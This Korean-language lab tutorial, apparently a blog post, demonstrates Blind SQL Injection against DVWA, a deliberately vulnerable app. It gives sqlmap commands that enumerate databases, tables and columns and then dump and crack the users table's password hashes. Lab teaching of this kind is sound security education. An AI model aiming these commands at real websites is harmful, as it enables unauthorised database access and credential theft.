취약한 웹 애플리케이션을 이용한 (DVWA) Blind SQL Injection 취약점 진단

이 도구를 이용하여 허용받지 않은 서비스 대상으로 해킹을 시도하는 행위는 범죄 행위 입니다. 해킹을 시도할 때에 발생하는 법적인 책임은 그것을 행한 사용자에게 있다는 것을 명심하시기 바랍니다.

Blind SQL Injection은 Error-Based SQL Injection과 같이 대상 웹 페이지에 취약점을 이용하여 비정상적인 데이터베이스 쿼리를 날려 공격하는 방식입니다.

Blind SQL Injection의 진단 화면 입니다. User ID 값을 입력히 URL을 확인해 보시면

http://자신의 IP/vulnerabilities/sqli_blind/?id=1&Submit=Submit 이런식으로 id 값이 들어가 있는것을 확인하실수 있으실 겁니다.

Blind SQL Injection 진단에서는 SQL MAP 이라는 툴을 사용하도록 하겠습니다.

■ Burp Suite(버프스위트) 메뉴 Extender + SQLMAP.exe 설치

데이터베이스를 추출하기 전에 공격 대상의 SQL Injection 취약점을 확인하기 위해서 SQL Injection 취약점을 진단하는 명령을 입력합니다. SQL Injection 자동화 공격을 진행할 때에는 [취약점 진단 -> DB -> 테이블 -> 칼럼] 순으로 정보를 추출합니다.

저는 파이썬코드로 이루어진 sqlmap 을 사용하였습니다. sqlmap.py -h 를 입력하게 되면 sqlmap 의 도움말을 보실수 있습니다.

DB 정보를 알아 내기

기본 명령어 형식 : sqlmap.py -u URL --dbs

- sqlmap.py -u "http://자신의 IP/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=b8i23ut9884cvjkavpvlv8ilm0; security=low" --dbs

테이블 정보 알아내기

기본 명령어 형식 : sqlmap.py -u URL -D (Database) --tables

- sqlmap.py -u "http://자신의 IP/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=b8i23ut9884cvjkavpvlv8ilm0; security=low" -D dvwa --tables

칼럼 정보 추출하기

기본 명령어 형식 : sqlmap.py -u URL -T (테이블정보) --column

- sqlmap.py -u "http://자신의 IP/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=b8i23ut9884cvjkavpvlv8ilm0; security=low" -D dvwa -T users --column

데이터베이스 계정 정보 추출하기

기본 명령어 형식 : sqlmap.py -u URL -C (칼럼정보) --dump

기본 명령어 형식 : sqlmap.py -u URL -D (데이터베이스명) -T (테이블정보) --dump

- sqlmap.py -u "http://자신의 IP/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=b8i23ut9884cvjkavpvlv8ilm0; security=low" -D dvwa -T users --dump

마지막 명령에서 해시 해독을 물어보면 Y를 선택합니다. 계정정보와 패스워드가 무작위로 노출되는 모습을 확인할수 있습니다.